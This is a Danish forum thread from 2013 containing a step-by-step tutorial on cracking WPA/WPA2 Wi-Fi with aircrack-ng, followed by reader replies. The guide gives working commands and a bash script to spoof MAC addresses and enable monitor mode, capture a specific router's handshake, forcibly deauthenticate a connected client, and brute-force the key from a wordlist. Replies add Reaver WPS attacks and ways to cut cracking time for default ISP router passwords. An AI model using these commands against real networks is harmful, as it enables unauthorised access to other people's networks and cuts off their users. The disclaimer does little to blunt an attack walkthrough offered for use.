Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
WPA/WPA2 Aircrack-ng [Fang et håndtryk]
05-08-2013, 11:03 (Denne besked var sidst ændret: 05-08-2013, 12:55 af humle.)
#1
Rainbow  WPA/WPA2 Aircrack-ng [Fang et håndtryk]
Dette er en guide til hvordan man fanger et trådløs wpa/wpa2 håndtryk. Hvad kan vi bruge det til? I dag er trådløse forbindelser blevet, så stor en hverdag for alle. At både private og store som små virksomheder har det. Vist man kan komme på det trådløse netværk, har man stort set skikrede sig adgang til mange nyttige informationer. Det er derfor et godt kundskab at kunne.

# Attention læs dette inden påbegyndelse
Frasigelse: Denne guide har til formål at lære om sikkerhedshuller. Det er til en hver tid bedst praktisk at gøre det i et sikkert kontrolleret miljø. Husk det er ulovligt at hacke andre og svare til at sparke døren ind i en anden vedkommens lejlighed. - Brug guiden på eget ansvar og ikke mit. (så er det ude af verden hårde tider :))


Følgende er brugt:
  1. Kali i vmware Download (indholder aircrack-ng suite)
  2. Aircrack-ng Suite Download
  3. Trådløs router
  4. Trådløs usb dongle

Nu skal vi til at starte vores trådløse usb dongle op.
Monitor mode betyder at der bliver indkørt en driver, som gør den trådløse usb dongle til et stykke multi værktøj
som ellers ville være låst af, den oprindelige driver. Med andre ord, vi for lov at bruge den til mere end bare trådløse forbindelser.

Først skal vi finde vores trådløse netværkskort, skifte MAC-adressen også starte det i monitor mode.
  1. iwconfig (min hedder wlan0)
  2. ifconfig wlan0 down
  3. macchanger -a wlan0
  4. ifconfig wlan0 up
  5. airmon-ng start wlan0
    Det første trådeløse netværkskort sat i monitor mode, er som regel mon0. Den skal vi også lige skifte MAC-Adressen på.
  6. [Billede: 51ff6ecf21d7f.png]

  7. ifconfig mon0
  8. macchanger -a mon0
  9. ifconfig mon0 up

Det kan vi få automatiseret ved at lave et lille hurtigt bash script gem det som 'changer.sh' og giv det tilladelse til at køre 'chmod 777 changer.sh':
Kode:
#!/bin/bash
# changer script til at få wireless monitor mode
# skfiter også mac adressen på begge interfaces
# skrevet af humle 5.8.2013

#Interfaces skift ud så det passer med dit
wlan=wlan0
mon=mon0

ifconfig $wlan down
macchanger -a $wlan
ifconfig $wlan up

airmon-ng start $wlan

ifconfig $mon down
macchanger -a $mon
ifconfig $mon up
clear

echo "NY MAC TIL MONITOR INTERFACE ", "("$mon")"
macchanger -s $mon
echo " "
echo " "
echo "NY MAC TIL INTERFACE ", "("$wlan")"
macchanger -s $wlan
echo "ENJOY WIRELESS SNIFFING IN A SECURE ENVIROMENT BY - Humle ;)"

Nu er vi klar til at finde vores netværk som skal fanges, derfor udføre vi følgende for at finde det.

  1. airodump-ng mon0 (lad den køre indtil du har set netværket ctrl-c for at afslutte)
  2. [Billede: 51ff6f5f9c28b.png]
  3. Nu ved vi hvilket netværk det er og hvilken kanal den køre på. Lad os starter vores trådløse lytter kun til at fange interaktioner fra den og skrive det til en fil.
  4. airodump-ng mon0 --bssid 74:44:01:F8:B3:B9 -c 11 -w humlenet_fanget
  5. ('--bssid' er routers MAC '-c' er den tråløse kanal '-w' står for "write to file" som skriver til filen vi skal bruge

Det vi har brug for nu, er at kigge efter en klient som er autoriseret til at gå på netværket. Når vi har fundet det. (i dit airodump-ng lytter vindue, kig efter 'STATION' det er klienter som er asoriseret med netværket) Så skal vi have fat i et andet værktøj fra aircrack-suite kaldet 'aireplay-ng' som har mange gode funktioner. Et af dem er at vi kan deautoriser en klient til at genskabe forbindelsen, hvilket gør at vores håndtrykt også bliver gensendt, som vi gerne vil fange. Det gøre vi på følgende måde (vore trådløse lytter bør køre nu, speciefik på det pågældende netværk):

  1. aireplay-ng mon0 -0 10 -a 74:44:01:F8:B3:B9 -c 00:24:2C:2B:77:75 -h 00:07:1d:87:d2:5c
  2. ('-0' er deautoriser. '10' så mange gange. '-a' router. '-c' klient. '-h' mon0 MAC)
  3. [Billede: 51ff70b102205.png]

Nu skal vi kigge på vores airodump-ng lytter for at se om vi har fanget håndtrykket. Det kan varier meget, hvor mange gange den skal deautoriser. En af de væsenlige ting er en god forbindelse. Den må altså ikke være for langt væk, ellers mister vi den i luften.
  1. [Billede: 51ff72ef60d3c.png]
  2. (øverst i højrehjørne kan vi se vi har fanget den)

Nu hvor vi har fanget vores håndtryk, kan vi forsøge at køre en ordliste igennem for at se om vi har den. Jo bedre din ordliste er jo støre chance er der for at finde den. Men desto mere tid vil det også tag at køre den igennem. Vælg altid den korrekte ordlist til formålet, undersøg altid så meget som muligt på forhånd, da det kan spare tid på køreles.

Til sidst køre vi vores fanget håndtryk igennem aircrack-ng med vores nøje udvalgt ordliste. Vidst du bruger Kali er der nogen standard nogen i '/usr/share/wordlist' aircrack-ng har alene det formåle at gennemtvinge kombinationer fra vores ordlist med vore fanget håndtryk.

  1. aircrack-ng -w /usr/share/wordlists/fasttrack.txt tmp/humlenet_fanget-01.cap
  2. Vist alt er gået godt, skulle det gerne se sådan ud til sidst.
  3. [Billede: 51ff74cd13279.png]

Nu har vi succesfuldt, fået kryptering's håndtrykket til netværket. Tid til at være kreativ :)

FAQ:
  1. Vist du ikke kan få dit trådløse kort i monitor mode. Understøttes det muligvis ikke google er din ven
  2. Jeg har en stor ordliste, det ville jo tage år? Ja der findes metoder til at fremskynde det. Tag et kig på cowpatty, pyrit eller hashcat vist du ikke kan vente.
  3. Som altid må du gerne give en kommentar og en bedømmelse, så er der altid noget konstruktivt at arbejde med, til næste guide.

Så der ikke så meget andet at sige end god fornøjelse.

./ Humle
"En af de mest citerede videnskabelige påstande er den om at humlebien ikke kan flyve, men den ved det ikke, og derfor flyver den bare alligevel".

----------------------------------------------------------------------------------------
Find alle beskeder fra denne bruger
Citer denne besked i et svar
07-08-2013, 18:11
#2
RE: WPA/WPA2 Aircrack-ng [Fang et håndtryk]
Godt arbejde Humle, i sær det lille macchanger script kunne være brugbart :)
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
08-08-2013, 19:18
#3
RE: WPA/WPA2 Aircrack-ng [Fang et håndtryk]
(07-08-2013, 18:11)Spagnum Skrev: Godt arbejde Humle, i sær det lille macchanger script kunne være brugbart :)

:) glæder at høre det kan bruges
"En af de mest citerede videnskabelige påstande er den om at humlebien ikke kan flyve, men den ved det ikke, og derfor flyver den bare alligevel".

----------------------------------------------------------------------------------------
Find alle beskeder fra denne bruger
Citer denne besked i et svar
15-08-2013, 12:43 (Denne besked var sidst ændret: 15-08-2013, 12:45 af onkel234.)
#4
RE: WPA/WPA2 Aircrack-ng [Fang et håndtryk]
Vil man kunne gøre det uden at have en trådløs adapter, og i stedet bare bruge for eksempel ens bærbars indbyggede adapter?
Find alle beskeder fra denne bruger
Citer denne besked i et svar
15-08-2013, 13:34
#5
RE: WPA/WPA2 Aircrack-ng [Fang et håndtryk]
(15-08-2013, 12:43)onkel234 Skrev: Vil man kunne gøre det uden at have en trådløs adapter, og i stedet bare bruge for eksempel ens bærbars indbyggede adapter?

Kun hvis du køre linux på computeren (f.eks. via en live cd), og hvis chipsettet er kompatibelt
http://www.aircrack-ng.org/doku.php?id=c...ty_drivers
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
15-08-2013, 21:12 (Denne besked var sidst ændret: 15-08-2013, 22:52 af crazyman.)
#6
RE: WPA/WPA2 Aircrack-ng [Fang et håndtryk]
God tut.
Det tager bare en evighed ved at bruge wordlist, du skal være satme heldig for at ramme den samme key som ruteren har. den her metode er næsten umulig, hvis koden ikke er på wordlisten, så kan den ikke finde den.
men man hvis man bruger reaver attack. så kan man gøre det på 2-10 timer.

Du kan se her hvordan, der er en hel video om det. Og det virker 100%, jeg bruger den selv. Men HUSK at skal bare bruge en ekstern wirreless USB/adapter ! ellers så kan man ikke.
https://www.youtube.com/watch?v=eWy5DDc5Hn0
Find alle beskeder fra denne bruger
Citer denne besked i et svar
16-08-2013, 07:09
#7
RE: WPA/WPA2 Aircrack-ng [Fang et håndtryk]
(15-08-2013, 21:12)crazyman Skrev: God tut.
Det tager bare en evighed ved at bruge wordlist, du skal være satme heldig for at ramme den samme key som ruteren har. den her metode er næsten umulig, hvis koden ikke er på wordlisten, så kan den ikke finde den.
men man hvis man bruger reaver attack. så kan man gøre det på 2-10 timer.

tak :)

Det sandt det afhænger af, at kunne findes i din wordlist. Der er gode metoder med CUDA eller STREAM for at speed det op. Jeg kan personligt køre en 16GB wordlist igennem på 3dage på et handshake.

Reaver er godt, men kun under særlig omstændigheder. 1. WPS skal være tændt 2. Der må ikke være en timeout på. også tag det ofte mere mellem 10-24 timer.

WPA handshakes har den fordel at de altid kan fanges og køres igennem. Telia Thomson Router køre eksempelvis med HEX alfabetet på 10 store karakter. Så hjem arbejde og standard, kan betydeligt reducere tiden brugt.

Man behøver ikke en USB wifi vist man køre uden for vmware, med sit indbyggede wifikort. Men der er fordele ved at have en, eksempelvis meget nemmer at manøver rundt med i en USB forlænger har jeg erfaring med :).
"En af de mest citerede videnskabelige påstande er den om at humlebien ikke kan flyve, men den ved det ikke, og derfor flyver den bare alligevel".

----------------------------------------------------------------------------------------
Find alle beskeder fra denne bruger
Citer denne besked i et svar
22-08-2013, 00:29
#8
RE: WPA/WPA2 Aircrack-ng [Fang et håndtryk]
Interessant.. Men burde du ikke censurere mac addresserne på billederne af de scannede netværk? Altså så folk ikke kan finde ud af hvor du bor..

En sidegade til Lyngbyvej måske? :P
Find alle beskeder fra denne bruger
Citer denne besked i et svar
22-08-2013, 17:32
#9
RE: WPA/WPA2 Aircrack-ng [Fang et håndtryk]
(22-08-2013, 00:29)jarraro Skrev: Interessant.. Men burde du ikke censurere mac addresserne på billederne af de scannede netværk? Altså så folk ikke kan finde ud af hvor du bor..

En sidegade til Lyngbyvej måske? :P

Mac adresser er der skam nok af :) - Nu var det hverken for at være anonym på nogen måder, da der intet ulovligt er forgået under guiden. Kan jeg ikke se hvorfor de skulle gøres blanke.

Angel Men det kunne da være hyggeligt at stikke hovederne sammen vist du bor tæt på - med interesse for IT. Så kunne det jo være man ku lære af hinandens viden :devil:
"En af de mest citerede videnskabelige påstande er den om at humlebien ikke kan flyve, men den ved det ikke, og derfor flyver den bare alligevel".

----------------------------------------------------------------------------------------
Find alle beskeder fra denne bruger
Citer denne besked i et svar
24-08-2013, 00:15 (Denne besked var sidst ændret: 24-08-2013, 00:15 af jarraro.)
#10
RE: WPA/WPA2 Aircrack-ng [Fang et håndtryk]
(22-08-2013, 17:32)humle Skrev: Mac adresser er der skam nok af :) - Nu var det hverken for at være anonym på nogen måder, da der intet ulovligt er forgået under guiden. Kan jeg ikke se hvorfor de skulle gøres blanke.

Fair nok, ville bare gøre opmærksom på mac adresser på routere kan i de fleste tilfælde bruges til at finde dens gps koordinater ;)
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)